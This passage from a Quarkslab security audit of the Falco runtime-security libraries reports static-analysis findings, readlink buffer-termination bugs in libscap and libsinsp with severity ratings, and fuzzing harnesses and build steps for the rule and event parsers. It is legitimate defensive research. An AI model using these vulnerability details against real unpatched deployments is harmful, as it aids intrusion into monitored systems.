-DUSE_BUNDLED_DEPS=ON\n-DCMAKE_C_COMPILER=/usr/share/clang/scan-build-10/bin/../libexec/ccc-analyzer\n-DCMAKE_CXX_COMPILER=/usr/share/clang/scan-build-10/bin/../libexec/c++-analyzer\n..◁arrowhookleft→\n◁arrowhookleft→\n◁arrowhookleft→\nscan-build -enable-checker unix,nullability,core,cplusplus,security --exclude\nb64-prefix --exclude c-ares-prefix --exclude catch2-prefix --exclude\ncloudtrail-plugin-prefix --exclude cloudtrail-rules-prefix --exclude\ncpp-httplib-prefix --exclude curl-prefix --exclude cxxopts-prefix --exclude\nfakeit-prefix --exclude grpc-prefix --exclude jq-prefix --exclude\njson-plugin-prefix --exclude k8saudit-plugin-prefix --exclude\nk8saudit-rules-prefix --exclude njson-prefix --exclude openssl-prefix\n--exclude protobuf-prefix --exclude re2-prefix --exclude\nstring-view-lite-prefix --exclude tbb-prefix --exclude valijson-prefix\n--exclude yamlcpp-prefix --exclude zlib-prefix make -j 32◁arrowhookleft→\n◁arrowhookleft→\n◁arrowhookleft→\n◁arrowhookleft→\n◁arrowhookleft→\n◁arrowhookleft→\n◁arrowhookleft→\n◁arrowhookleft→\n◁arrowhookleft→\nNote that the --exclude flag will not disable checking the code of dependencies but just filter out\nthe results in the report. That’s why this scan can take a significant amount of time to process.\nScan-Build generates an HTML report that explains each issue in detail, illustrating the multiple\nsteps and the branches the program must take to be in the situation indicated by the tool. The\nHTML report generated from the above steps will be included with this report under the file name\nscan-build-44d1c1e.tar.gz , open the index.html file for more information.\nResults\nApart from the security checkers (security checker is just issuing warning based on some function\nname), the clang static analyzer found some potential issues. Here are some comments on what\nit found, some issues seem real, some are certainly false positives, and some may come from\nconfusion in macros.\n•A double free - in libscap scap.cfile, from the scap_open function, when calling scap_-\nopen_udig_int , a double free occurs because the function that calls scap_close(handle)\nwill free the handle, and on the next line, the handle is freed again with free(handle) .\nRemoving line 317 should solve the issue.\n•A garbage return value - in libsinsp sinsp.cpp , the function sinsp::get_read_-\nprogress_with_str , with a specific control flow execution detailed in the report, can\nreturn a non-initialized stack variable, which might be garbage and disrupt the execution.\n•A dangerous construct in a vforked process - in the code related to the gvisor engine in\nlibscap/engine/gvisor/runsc.cpp , the vforked process is closing a file descriptor which\ncould be an undefined behavior according to POSIX, and it should not call exit(3) as well.\nSome refactoring could be done considering the restriction and caution on using vfork(2) .\n•Ten NULL pointer dereferences - the path of execution are various in length but it might\nbe interesting to investigate these highlight to fix this potential issues that could result in\ncrashes.\n•Five cases of argument with nonnull attribute passed null - the static analyzer re-\nvealed 41 issues like that, it seems that most of them are not interesting because they\nhighlight a potential null value in a comparison with an int. However, five of these\nRef: 23-01-1097-LIV 16 Quarkslab SAShighlights result in a null pointer being passed to arguments of memcpy, three of\nthem the destination, and two of them the source. Here are their names in the scan-\nbuild-44d1c1e.tar.gz archive: report-2dfbca.html ,report-9cb243.html ,report-\n760867.html ,report-940464.html ,report-e46a72.html .\n•Five memory leaks - in various places of the codebase, they seem to be realistic scenarios\nof memory leaks. Some involve more steps than others and their path of execution might\nterminate execution but should be investigated.\n•Four dead store issues - two dead assignments and two dead increments which are real\nbut might not even be considered as bugs since eliminating them could lead to other bugs\nin the future by missing these assignments and increments.\n•Use of zero allocated memory -infunctionscap_write_proc_fdswhichiscertainlyexpected,\nso a false positive.\n•Some division by zero and use-after-free issues - a total of eighteen issues that seem to\nbe false positives confusions because of the usage of macro for hash maps manipulation.\nLOW 7 Double free in libscap/scap.c functionscap_open\nCategory Double free\nRating Impact: Integrity, Confidentiality,\nAvailabilityExploitability : None\nLOW 8 Garbage return value from stack in libsinsp/sinsp.cpp\nCategory Garbage return value\nRating Impact: Availability Exploitability : None\nINFO 6 Dangerous construct in a vforked process in lib-\nscap/engine/gvisor/runsc.cpp\nCategory Incorrect use of vfork\nRating Impact: Availability Exploitability : None\n6.1.5 Conclusion\nThese four static analyzers produced interesting results. Because CodeQL cannot, at the moment,\nexclude files on database creation or systematically exclude files at the analysis stage, it’s a bit\ndifficult to integrate with Falco. Otherwise, including Cppcheck is easy since it’s directly running\non the source code. Then, integrating more elaborate analyzers like Infer and Scan-Build is more\ncomplex, but possible, and can provide more hints on potential issues in the future.\nRef: 23-01-1097-LIV 17 Quarkslab SASOn top of that, some analyzers like Infer have options for differential analysis, thus running only\non the addition that was made in a pull request7, thus cutting the noise from the rest of the\nproject issues. Cppcheck can also only run on specified files, which can limit the scope of the\nanalysis but provide useful information.\n6.2 Manual review\nThe manual review was mainly performed in two ways, trying to find issues in sensitive areas,\nsuch as some libscap functions for example, and systematically searching for particular patterns\non all code base. The first way guiding the latter. The code reviewed was the code of the libs.\n6.2.1 Issues with readlink\nFrom the Falco threat model (see Figure 5.1) we identified that libscap functionscap_proc_-\nscan_proc_dir must be investigated. Indeed, being able to influence procfs content is at the\nreach of every user of the system by starting carefully crafted processes. Such a function, because\nit is parsing text from the procfs file interface is highly specific to Linux and building an automated\nfuzzing setup, reproducing the whole procfs interface, would be extremely time-consuming and\nquickly out of date. That is why a manual review would be more efficient for this part of the code.\nIssue in scap_proc_fill_root with readlink\nMost of the code manipulating strings is carefully terminating them with 0but an issue was\nspotted in the function that is called to retrieve the root folder path of a process.\n554 static int32_t scap_proc_fill_root(scap_t *handle, struct scap_threadinfo * tinfo,\nconst char * procdirname) ◁arrowhookleft→\n555{\n556 charroot_path[SCAP_MAX_PATH_SIZE];\n557 snprintf(root_path, sizeof(root_path), \"%sroot\", procdirname);\n558 if( readlink(root_path, tinfo->root, sizeof(tinfo->root)) > 0)\n559 {\n560 returnSCAP_SUCCESS;\n561 }\n562 else\n563 {\n564 snprintf(handle->m_lasterr, SCAP_LASTERR_SIZE, \"readlink %s failed (%s)\",\n565 root_path, scap_strerror(handle, errno));\n566 returnSCAP_FAILURE;\n567 }\n568}\nTheissueisthat readlink doesnotnull-terminatethestringthatwillreadandcopiedinto tinfo-\n>rootand the size of the buffer is sizeof(tinfo->root) instead of sizeof(tinfo->root) - 1\nto let space for inserting a zero at the last index. Thus it’s possible to create a path exceeding\n7https://fbinfer.com/docs/steps-for-ci\nRef: 23-01-1097-LIV 18 Quarkslab SASSCAP_MAX_PATH_SIZE and chroot a program into it in order for this part of the code to write a\nnot null-terminated string into the structure of the size.\nSee the following listing for the structure in which the root buffer appears, on line 8.\n1typedef struct scap_threadinfo\n2{\n3 // [...] abbreviated\n4 int64_t vtid;\n5 int64_t vpid;\n6 charcgroups[SCAP_MAX_CGROUPS_SIZE];\n7 uint16_t cgroups_len;\n8 charroot[SCAP_MAX_PATH_SIZE+1];\n9 intfiltered_out; ///< nonzero if this entry should not be saved to file\n10 scap_fdinfo* fdlist; ///< The fd table for this process\n11 uint64_t clone_ts;\n12 int32_t tty;\n13 int32_t loginuid; ///< loginuid (auid)\n14\n15 UT_hash_handle hh; ///< makes this structure hashable\n16}scap_threadinfo;\nIn theory, because the static size buffer is inserted directly in the structure, the situation could\npotentially mean that future reads of this string, supposed to be null-terminated, could overflow\nand read the data of the next structure’s fields values. However, the size of the buffer is SCAP_-\nMAX_PATH_SIZE + 1 , which translates to 1025, so the compiler will align the next fields, resulting\nin the next integer to be shifted by some blocks. And because this structure is allocated using\ncalloc, the bytes hole will be filled with zeros. The result will be a string with a size equal to\nthe expected length plus one, which could potentially be an issue with copies trusting that the\nstring is well formed.\nIt seems that this situation is not present in the codebase, for example, line 433 of\nuserspace/libscap/scap_savefile.c , the computation of the length is performed using\nstrnlen using the constant 1024 as max length rootlen = (uint16_t)strnlen(root, SCAP_-\nMAX_PATH_SIZE); .\nFind in Appendix D more information about how to exploit this issue and debug with GDB to\nunderstand the situation.\nMEDIUM 1 Potential buffer overflow due to not null terminated output of readlink inlib-\nscap/scap_proc_file_root\nCategory Buffer overflow\nRating Impact: Availability, Integrity Exploitability : None\nRef: 23-01-1097-LIV 19 Quarkslab SASSearching similar issues in libscap\nBecause a first issue was found with readlink , other parts of the codebase were investigated\nlooking for the same programming mistake. We used ripgrep8to search the codebase.\nuserspace/libscap/scap_procs.c\n63: target_res = readlink(filename, tinfo->cwd, sizeof(tinfo->cwd) - 1);\n558: if ( readlink(root_path, tinfo->root, sizeof(tinfo->root)) > 0)\n723: target_res = readlink(filename, target_name, sizeof(target_name) - 1);\n// Getting the target of the exe, i.e. to which binary it points to ◁arrowhookleft→\n756: // null-terminate target_name (readlink() does not append a null byte)\nInuserspace/libscap/scap_procs.c , the issue from the previous section is present on line\n558, where tinfo->root is not null terminated. On line 63 and line 723, the bufsize , third\nargument of readlink is correctly set to the size of the buffer minus one.\nuserspace/libscap/scap_fds.c\n418: r = readlink(fname, link_name, SCAP_MAX_PATH_SIZE);\n619: r = readlink(fname, link_name, SCAP_MAX_PATH_SIZE);\n727: r = readlink(fname, link_name, SCAP_MAX_PATH_SIZE);\n1609: r = readlink(f_name, link_name, sizeof(link_name));\nInuserspace/libscap/scap_fds.c , all the readlink call are made with\nSCAP_MAX_PATH_SIZE (even in the forth case, because link_name is always initialized as\nchar link_name[SCAP_MAX_PATH_SIZE]; ). The issue is that then these buffer are manually null\nterminated doing link_name[r] = ’\\0’; leading to an overflow by one. Let’s see an example,\nthe one line 619:\n616 charlink_name[SCAP_MAX_PATH_SIZE];\n617 ssize_t r;\n618\n619r = readlink(fname, link_name, SCAP_MAX_PATH_SIZE);\n620 if(r <= 0)\n621{\n622 returnSCAP_SUCCESS;\n623}\n624\n625link_name[r] = '\\0';\nCompiled with -O0, the compiler lets the locals in the order there are declared on the stack, thus\nwe have on the stack (in the order of the stack growth), the return address, a canary, the frame\npointer and the end of the link_name . So the line link_name[r] = ’\\0’; will effectively write\na zero out of bound on the frame pointer, which might start with zeros.\nSo in this precise situation, there are no consequences. But in a different setup, where locals\ncould be located before the buffer, the stack overflow could theoretically lead to issues.\nIt is recommended to always readlink with abufsize of the buffer size minus one, and then to\ncorrectly null terminate the string using the return value as the index.\n8https://github.com/BurntSushi/ripgrep\nRef: 23-01-1097-LIV 20 Quarkslab SASLOW 9 Four null terminations of buffers written out of range by one in libscap/scan_-\nfds.c\nCategory Buffer overflow\nRating Impact: Availability, Integrity Exploitability : Easy\nSearching similar issues in libsinsp\nuserspace/libsinsp/sinsp_auth.cpp\n71: ssize_t sz = readlink(fd_path.c_str(), buf, sizeof(buf));\n72- if(sz != -1 && sz <= static_cast<ssize_t>(sizeof(buf)))\n73- {\nThebufsize is equal to sizeof(buf) but it’s not an issue since the value is later copied using\nreal size of the content of buf using std::string::assign .\nuserspace/libsinsp/threadinfo.cpp\n1108: ret = readlink(proc_path, dirfd_path, sizeof(dirfd_path) - 1);\n1109- if (ret < 0)\n1110- {\nInthreadinfo.cpp , the second finding of the above output, the bufsize is correctly specified.\nuserspace/libsinsp/parsers.cpp\n4486: target_res = readlink((chkstr + \"/\").c_str(),\n4487- target_name,\n4488- sizeof(target_name) - 1);\nFinally, in parsers.cpp , thetarget_name buffer is not null terminated which could lead to an\noverflow. However this piece of code is by default not used, you must specify the -Aflag to analyze\nthegetcwdsyscall. And on top of that, it is only debug code that is not shipped in the release.\nINFO 7 Buffer overflow with not null terminated output of readlink in debug code in\nlibsinsp/parsers.cpp\nCategory Buffer overflow\nRating Impact: Availability, Integrity, Confi-\ndentialityExploitability : None\nChecking the return value of readlink\nIn the previous sections, we searched for potential buffer overflows but, in addition to this issue,\nmost of these usages of readlink are potentially vulnerable to referring to the wrong file. Indeed,\nRef: 23-01-1097-LIV 21 Quarkslab SASreadlink takes the bufsize as a third argument and if the return value is equal to this, it means\nthat “truncation may have occurred”. The return value should be compared against bufsize and\nincrease the buffer or handle the error properly.\nIn many situations above, especially when reading from files in /proc/%d/fd , this issue is almost\nimpossible to exploit since it would require a legitimate absolute path target longer than 1024\nbytes because the path in the fddirectory are already canonicals thanks to the kernel.\nExample in userspace/libsinsp/sinsp_auth.cpp , line 71. Thereadlink call could result\nin a situation where it returns bufsize , its third argument, which here is sizeof(buf) . In this\nsituation “truncation may have occurred” and it’s not possible to know if the path was exactly this\nsize or more. This means that the buffer could contain a path to a different file than expected . See\nthis extract of the method.\n1std::string sinsp_ssl::memorize_file( conststd::string& disk_file)\n2{\n3 std::string mem_file;\n4 // [...]\n5 if(fd != -1)\n6 {\n7 charbuf[FILENAME_MAX] = { 0 };\n8 std::ifstream ifs(disk_file);\n9 std::string fd_path = \"/proc/self/fd/\" + std::to_string(fd);\n10 ssize_t sz = readlink(fd_path.c_str(), buf, sizeof(buf));\n11 if(sz != -1 && sz <= static_cast <ssize_t>(sizeof(buf)))\n12 {\n13 mem_file.assign(buf, sz);\n14 std::string str;\n15 std::ofstream ofs(mem_file, std::ofstream::out);\n16 while(std::getline(ifs, str))\n17 {\n18 ofs << str << '\\n';\n19 }\n20 }\n21 // [...]\n22 returnmem_file;\n23}\nSo if the real path behind the file descriptor symlink is too long, readlink returnssizeof(buf)\nline 10 of the example above, then, the if condition statement is true and the content of the\nbuffer at the maximum size of sizeof(buf) is copied into mem_file . Later, line 15, an output\nfile stream is created based on this path and written to, line 18. So if the realpath is long enough,\nit’s possible to write to a different location than expected.\nIn theory, the program could use the symlink and let the kernel redirect the writing operation to\nthe correct file but it seems that the functions want to return the realpath to the caller, line 22.\nWe tried to exploit this bug but it seems that this method is private and never referenced in the\nwhole codebase. So maybe this can be deleted instead of refactored.\nRef: 23-01-1097-LIV 22 Quarkslab SASINFO 8 Return value in various usage of readlink is not checked which could lead to\nwrite to a different file\nCategory Unchecked return value\nRating Impact: Confidentiality Exploitability : None\nConclusion on readlink\nTo conclude on the readlink syscall, there are three main issues in its usage:\n1.readlink does not append a null byte to the buffer which could lead to buffer overflow if\nnot manually written.\n2.The return value is often used as an index to write the terminating zero but could go out of\nboundsifthe bufsize ,thethirdargumentisequalto sizeof(buf) andnotsizeof(buf)-1 .\n3.The return value should be checked not only against -1but also when it’s equal to bufsize ,\nthe third argument. It could imply that truncation may have occurred, ending up with a\npath to the wrong file.\n6.2.2 Checks on sensitive functions\nHere is a non comprehensive list of common functions known to be unsafe in the sense that\nthey can easily be misused and can lead to crashes or buffer overflow attacks when used with\nuser-controlled inputs. Some are also not mentioned because they don’t appear in the codebase.\n•gets- the “insecure by default” getsis not used in the codebase, its more safe counterpart\nfgetsis, however.\n•strcpy- there are 30 occurences of strcpy, which could be replaced with safer strncpy or\nevenstrlcpy which don’t assume infinitely long string and can guarantee null termination\nin some cases.\n•sprintf - there are 21 occurrences of sprintf that could be replaced with snprintf ,\nwhich don’t assume infinitely long string.\n•sscanf- there are 45 occurences of sscanf, mostly to parse structured files in procfs that\ncannot be directly manipulated by users.\n•realloc - the interface of realloc can lead to misuses. realloc is called 22 times in\nthe codebase, irregularly, sometimes checking the return value properly and sometimes\nwithout. Even if this issue could be theoretical because memory allocation failing can be\nthe symptom of greater issues, it’s good practice to properly check the return value.\n•access- there are 4 occurences of access. It’s typically used to know if the effective user\nhas the right to access a file before opening it but present security issues because of potential\nTOCTOU vulnerability it creates. However, when searching we found two usages in libscap,\nmostly on files in procfs that cannot be modified, and two usages in libinsp, mostly to checks\nfiles, all seeming non-problematic.\nRef: 23-01-1097-LIV 23 Quarkslab SAS•atoi- there are 7 occurences of atoi, it seems that atof,atoloratollare not used\nin the project. The function is used mostly in example and test code but also in lib-\nscap/scap_procs.c , inengine/bpf/scap_bpf.c and twice in libsinsp/container_en-\ngine/docker/async_source.cpp . The issue is that atoidoes not detect errors and just\nreturns 0 for error cases. This function can be replaced with strtolorsscanfwhich can\nhandle the error cases properly.\n•realpath - there are 2 occurrences of realpath inchisel/chisel_utils.cpp , that can\nbe vulnerable to directory traversal attacks, symlink attacks or resource exhaustion. In\nthose specific cases, realpath is called with the second argument as the nullptr so the\nfunction allocated a buffer automatically with a size up to PATH_MAX or return an error.\nMost of these functions are not inherently insecure (except maybe for gets), but their usage\ncan be problematic in some situations. Some assume that strings can be infinitely long where\ndestination buffers are very finite, others have their return value typically badly handled or can\ncreate race conditions. Some have safer alternatives, that are not inherently secure but put an\nemphasis on what should be correctly taken care of.\n6.2.3 Third-party dependencies version\nFalco being built with various dependencies, we checked for CVE on those libraries, especialy\nthose potentially being exposed to the end user. For example, a minimalistic HTTP server based\non cpp-httplib9is embedded in Falco userland process, which just answers to GET /healthz with\n{\"status\": \"ok\"} , enabling some external monitoring.\nIf those dependencies are not all up to date, they are however regularly updated and none of the\nCVEs were applicable to the context of use in Falco.\n6.2.4 Conclusion\nMost of the time dedicated to the manual review of the code was spent on libscap because it’s a\nC component that interacts with the system implementation details and interfaces using many\nsyscalls and libc functions. Globally the code quality of Falco is good, but as we saw during our\nresearch on specific pain points, the quality can sometimes be heterogeneous (similar syscalls or\nlibc functions called in different ways), which is not surprising in popular open source project.\n9https://github.com/yhirose/cpp-httplib\nRef: 23-01-1097-LIV 24 Quarkslab SAS7 Dynamic analysis\nOne of the main focuses of this audit was to build fuzzers for security-relevant areas of Falco.\nThe threat model built during this audit was helpful to define which area should be investigated.\nAlthough the attack surface considered was mostly the one a random unprivileged user on the\nsystem has to interact with Falco, some early investigations were done on components a priori\nonly available to super users.\nIndeed, a first fuzzer was built for the rules parser because it was quite natural to fuzz and a\ngood first project for Quarkslab’s engineers to get familiar with the build system.\n7.1 Fuzzing the rules parser\nFirst, the diagram on the Figure 7.1 was used to visualize the attack surface of Falco. Please note\nthat this figure is a bit dated at the moment, because of the new plugin mechanism that can\nhandle Kubernetes audit events as any other plugin.\nFigure 7.1: Falco architecture from the project documentation\nFrom the userland, there are two entries to the program in YAML, one is the configuration, which\nshould be a simple parsing, and another the rules Falco should use to filter the events. Writing\ntext parsers in C/C++ is notoriously error-prone so it was a good first target for fuzzing although\nit’s not a priority considering the fact that these files should be accessible only by superusers.\nFalco maintainers did a rewrite in C++ of their rule parser recently, it was previously written in\nLua. This work was done in a PR untitled refactor(libsinsp): renovate the filter grammar, parser,\nand compiler1with a proposed grammar in EBNF syntax.\n1https://github.com/falcosecurity/libs/pull/217\nRef: 23-01-1097-LIV 25 Quarkslab SASHarness\nThe interface of the parser is ideal to implement fuzzing. A parserobject has to be initialized\nwith a string as an input and then parse() needs to be called. It’s possible to write a basic\nlibfuzzer harness like the following piece of code, directly inspired by test files that use a similar\ncode.\n#include <filter/parser.h>\n#include <string.h>\nextern\"C\" intLLVMFuzzerTestOneInput( uint8_t* data, size_tsize)\n{\nchar* in = ( char*)malloc(size + 1);\nmemcpy(in, data, size);\nin[size] = '\\0';\nlibsinsp::filter::parser parser(in);\ntry\n{\nparser.parse();\n}\ncatch(std::runtime_error& e)\n{\n// do not crash on handled exceptions, ignore.\n}\nfree(in);\nreturn0;\n}\nListing 1: Harness for fuzzing the rules parser\nTo build this harness, the code was put in a dedicated file in the libsinsp/examples folder,\nmodifying the local CMakeLists.txt adding the following lines.\nadd_executable(fuzz-example\nfuzz.cpp\n)\ntarget_link_libraries(fuzz-example\nsinsp\n)\nAnd adding the following lines at the top CMakeLists.txt of libs to enable ASAN.\nadd_compile_options(-fsanitize=address)\nadd_link_options(-fsanitize=address)\nRef: 23-01-1097-LIV 26 Quarkslab SASCorpus\nTo generate a corpus of rules quickly, test case strings were gathered very quickly with a command\nsimilar to the following ones. This is not ideal since it will generate wrong inputs that will be\ndiscarded by the fuzzer quickly. Lines were also extracted in a crude way from the default rules\nfiles in YAML.\ngrep -v EXPECT filter*.ut.cpp | grep -e '\".*\" '-o | cut -d \"\\\"\" -f 2 | split -l 1\nyq'.[].condition '../falco_rules.yaml | uniq | split -l 1\nResults\nThe harness on Listing 1 was used for persistent mode fuzzing with HonggFuzz for almost 14\nhours, see Figure 7.2, it did not run into any crashes during the whole fuzzing session.\nFigure 7.2: Results of fuzzing in persistent mode with Honggfuzz for a night\nSimilarly, AFL++ was run over the harness in the persistent mode for a shorter amount of time to\nsee if it could spot other issues but it did not during our experimentations. Please note that to do\nthe same with AFL++ you need to add some boilerplate code that you can find in Appendix E.\nRef: 23-01-1097-LIV 27 Quarkslab SASFigure 7.3: Results of fuzzing in persistent mode with AFL++ for 8 hours with 4 instances\nThis does not mean that the parser is bug-free, but at least no bug would produce a crash was\nfound during the fuzzing session, and the harness was compiled with ASAN to produce explicit\ncrashes on memory errors. The coverage produced by the fuzzing session was checked manually\nand it seemed like the fuzzer went over most of the codebase of the parser successfully.\n7.2 Fuzzing the event processor\nHaving the goal of building fuzzers for the userspace part of Falco, the main target was the\nsinsp_parser::process_event function. This function takes a pointer to an event as input and\ncan be seen as a router to the appropriate parser for the encoded event. For example, if the event\nhappens to be a PPME_SYSCALL_PIPE_X , which is the exit Falco event for the pipe(2) syscall, this\nfunction will redirect the execution to parse_pipe_exit . The parser will then retrieve the event\nparameters in the following manner.\n// [...]\nparinfo = evt->get_param(0);\nretval = *( int64_t *)parinfo->m_val;\nASSERT(parinfo->m_len == sizeof(int64_t));\n// [...]\nparinfo = evt->get_param(1);\nASSERT(parinfo->m_len == sizeof(int64_t));\nfd1 = *( int64_t *)parinfo->m_val;\n// [...]\nFuzzing such big “router” would be interesting since the implementation is tedious and verifying\nRef: 23-01-1097-LIV 28 Quarkslab SASthere is no error in this code might be even harder. The issue is that forming a valid, but random,\nevents (i.e., doing structured fuzzing) for so many different events is difficult.\nOntopofthat, anotherdifficultyisthatsomeparsersdonotactuallyparseallthebuffercontaining\nthe event’s arguments. These arguments are later “lazy loaded” when filtering is happening on\nthese specific events fields to reduce the overall load. That’s why it might not be sufficient, in\norder to reach the code that would trigger an issue, to only ingest the events with the parsers.\nThat’s an illustration of a case in which fuzzing could be more complex and more time consuming\nthan doing a manual review, especially because the target is parsing a highly structured format\nand might not be built with fuzzing in mind.\nSee in the following sections multiple ideas investigated by Quarkslab’s engineers. The order does\nnot reflect the chronological reality. Usage of libprotobuf-mutator was investigatedin Section 7.2.1\nin order to do structured fuzzing targeted directly at particular event parsers. Then usage of\nsyzkaller in Section 7.2.2 was explored, to fuzz the syscalls on a system with an instrumented\nversion of Falco running and getting coverage in the kernel engine. And then, fuzzing the scap\nfile format in Section 7.2.3 was looked into for unstructured fuzzing, it mostly uncovered issues\nin the file format handling.\n7.2.1 Using libprotobuf-mutator\nFor structured fuzzing in C/C++, libprotobuf-mutator2is a library to randomly mutate protobuf\nmessage. It could be used together with guided fuzzing engines, such as libFuzzer. The overall\nidea is to define a structure in protobuf format and libprotobuf-mutator will mutate the fields\nwith type-valid values.\nFalco maintainers pointed us to the driver/event_table.c files inlibsthat defines all the\nevents supported by Falco. See the following listing for an extract of that structure.\n// [...]\n/* PPME_SYSCALL_CLOSE_E */ {\"close\", EC_IO_OTHER | EC_SYSCALL, EF_DESTROYS_FD |\nEF_USES_FD | EF_MODIFIES_STATE, 1, {{\"fd\", PT_FD, PF_DEC} } }, ◁arrowhookleft→\n/* PPME_SYSCALL_CLOSE_X */ {\"close\", EC_IO_OTHER | EC_SYSCALL, EF_DESTROYS_FD |\nEF_USES_FD | EF_MODIFIES_STATE, 1, {{\"res\", PT_ERRNO, PF_DEC} } }, ◁arrowhookleft→\n/* PPME_SYSCALL_READ_E */ {\"read\", EC_IO_READ | EC_SYSCALL, EF_USES_FD |\nEF_READS_FROM_FD, 2, {{\"fd\", PT_FD, PF_DEC}, {\"size\", PT_UINT32, PF_DEC} } }, ◁arrowhookleft→\n/* PPME_SYSCALL_READ_X */ {\"read\", EC_IO_READ | EC_SYSCALL, EF_USES_FD |\nEF_READS_FROM_FD, 2, {{\"res\", PT_ERRNO, PF_DEC}, {\"data\", PT_BYTEBUF, PF_NA} }\n},◁arrowhookleft→\n◁arrowhookleft→\n// [...]\nIn addition of this file, a documentation page is available on the Falco website3. More importantly,\nthis page displays which syscalls are monitored by default, for performance reasons, without\nspecifying the -Aflag that enables everything. Thus, the default list, on top of the syscalls that\n2https://github.com/google/libprotobuf-mutator\n3https://falco.org/docs/rules/supported-events/\nRef: 23-01-1097-LIV 29 Quarkslab SASare typically available in Kubernetes containers enviromnent4, can be used to make a priority list\nof syscalls parsers that should be fuzzed with structured fuzzing.\nCompiling libprotobuf-mutator\nOne of the main difficulties was to link a binary with libprotobuf-mutator which was using a\ndifferent version of protobuf than Falco. The solution to link without bothering with missing\nsymbols or multiple definitions is to align the protobuf version used by libprotobuf-mutator with\nthe one used by Falco. Fortunately, libprotobuf-mutator v1.1 compiles with an older protobuf\nversion.\ngit clone https://github.com/google/libprotobuf-mutator.git\ncd libprotobuf-mutator\ngit checkout v1.1\nIn the file cmake/external/protobuf.cmake , modify line 66 with GIT_TAG v3.17.3 , which is\nthe version used by Falco at the moment of the audit (see 3.2).\nmkdir build\ncd build\ncmake .. -GNinja -DCMAKE_C_COMPILER=clang -DCMAKE_CXX_COMPILER=clang++\n-DCMAKE_BUILD_TYPE=Debug -DLIB_PROTO_MUTATOR_DOWNLOAD_PROTOBUF=ON ◁arrowhookleft→\nninja\nAt this point we successfully compiled a version of libprotobuf-mutator compatible with the\nprotobuf version Falco use.\nWriting the proto file and the harness\nThe example here will use the events associated with the open(2) syscall.\nFirst, a proto file must be written containing the value types needed for filling the arguments of\nthe event we want to generate. Unfortunately, protobuf cannot take expression as input for enum\nvalues, so all bitwise flag values must be written directly, instead of using the practical 1 « N\nnotation. In our situation, the proto file will look like the abbreviated following version (see the\nfull proto definition in the listing in Appendix F).\nsyntax= \"proto3\";\npackage sys_open ;\nmessage event_args {\nuint64fd = 1;\nstringfspath = 2;\nrepeated FILE_FLAGS flags32 = 3;\n4Restricted seccomp profiles are still not applied by default in Kubernetes, but Linux capabilities are already restricted,\nthus reducing the syscalls available even running as root.\nRef: 23-01-1097-LIV 30 Quarkslab SASFILE_MODE mode = 4;\nuint32dev = 5;\nuint64ino = 6;\n}\n// [...]\nThen generate the C++ stubs with the protobuf compiler, make sure to use the one\ncompiled along libprotobuf-mutator, it’s available in the project build folder libprotobuf-\nmutator/build/external.protobuf/bin/protoc .\nprotoc --version # this should output \"libprotoc 3.17.3\"\nprotoc --cpp_out=. sys_open.proto\nThis command should generate two files, sys_open.pb.cc andsys_open.pb . Now, a piece of\ncode must be written, using the generated input to fuzz our parsers: the harness. Thanks to\nthe help of a Falco maintainer, we modified a version of the sinsp_with_test_input.h ’s class\nsinsp_with_test_input to add our event on an inspector. The resulting harness is similar to\nthe following piece of code.\n1 #include <parsers.h>\n2\n3 #include \"sinsp_fuzz.h\"\n4 #include \"sys_open.pb.h\"\n5\n6 #include \"libprotobuf-mutator/src/libfuzzer/libfuzzer_macro.h\" // defines DEFINE_PROTO_FUZZER\n7\n8 int32_t fuzz_bitwise_flag = 0;\n9\n10 static protobuf_mutator::libfuzzer::PostProcessorRegistration<sys_open::event_args> reg = {\n11 [](sys_open::event_args* msg, unsigned int seed)\n12 {\n13 fuzz_bitwise_flag = 0;\n14 for(int32_t flag : msg->flags32())\n15 {\n16 fuzz_bitwise_flag |= flag;\n17 }\n18 }};\n19\n20 DEFINE_PROTO_FUZZER( const sys_open::event_args& msg)\n21 {\n22 sinsp_fuzz s;\n23\n24 s.SetUp();\n25 s.add_default_init_thread();\n26 s.open_inspector();\n27\n28 auto evt = s.add_event_advance_ts(s.increasing_ts(), 1, PPME_SYSCALL_OPEN_E, 3,\nmsg.fspath().c_str(), fuzz_bitwise_flag, msg.mode()); ◁arrowhookleft→\n29 evt->load_params();\n30\n31 evt = s.add_event_advance_ts(s.increasing_ts(), 1, PPME_SYSCALL_OPEN_X, 6, msg.fd(),\nmsg.fspath().c_str(), fuzz_bitwise_flag, msg.mode(), msg.dev(), msg.ino()); ◁arrowhookleft→\n32 evt->load_params();\n33\n34 s.TearDown();\n35 }\nRef: 23-01-1097-LIV 31 Quarkslab SASTheDEFINE_PROTO_FUZZER macro and the post processor are part of the libFuzzer integration of\nlibprotobuf-mutator, see the section in the README for more details5. To detail the example here,\non the line 11 of harness, a lambda is defined to post process the generated protobuf message in\norder to create a file flags argument with one or more bits set one. From line 20 to line 35 is the\npart of the code that will be replayed by libFuzzer.\nAt this point we have a protobuf definition that is used in a libFuzzer harness and the compiled\nprotobuf-mutator libraries.\nCompile with libFuzzer\nTo compile with LLVM libFuzzer, you mostly need to pass the -fsanitize=fuzzer flag to clang.\nPlease note that you mustcompile with clang and not gcc. To compile everything that was\npresented in the last sections, use the following lines in the CMakeLists.txt oflibsinsp/test ,\nfixing the relative paths, or create a new one under libsinsp/test/fuzz with the following\ncontent.\nadd_compile_options(-fsanitize=fuzzer,address)\nadd_link_options(-fsanitize=fuzzer,address)\nadd_executable(fuzz_sys_open\nsys_open.pb.cc\n../test_utils.cpp\nfuzz_sys_open.cpp\n)\n# Set this path to your libprotobuf-mutator installation directory\nset(LIBPROTOBUF_MUTATOR_BASEDIR \"/home/mahe/falco-security/libprotobuf-mutator/\")\ntarget_include_directories(fuzz_sys_open PRIVATE\n\"${LIBPROTOBUF_MUTATOR_BASEDIR}\"\n# no need for the following, already included with others Falco dependencies\n# \"/home/mahe/falco-security/libprotobuf-mutator/buildy/external.protobuf/include\")\n)\ntarget_link_libraries(fuzz_sys_open\n\"${LIBPROTOBUF_MUTATOR_BASEDIR}/build/src/libfuzzer/libprotobuf-mutator-libfuzzer.a\"\n\"${LIBPROTOBUF_MUTATOR_BASEDIR}/build/src/libprotobuf-mutator.a\"\n# no need for the following, already included with others Falco dependencies\n# \"/home/mahe/falco-security/libprotobuf-mutator/build-test/external.protobuf/lib/libprotobufd.a\"\nsinsp\n)\nFor ASAN to work on the whole code, the following lines must be added at the beginning of the\nrootCMakeLists.txt .\nadd_compile_options(-fsanitize=address)\nadd_link_options(-fsanitize=address)\nTo reproduce exactly this setup, we generated a diff that can be applied to falco libsrepo from\nversion described in Table 3.2, tag 0.9.0, see the file named sys_open_fuzz.diff . Go to the root\nof the git libsrepository and type the following 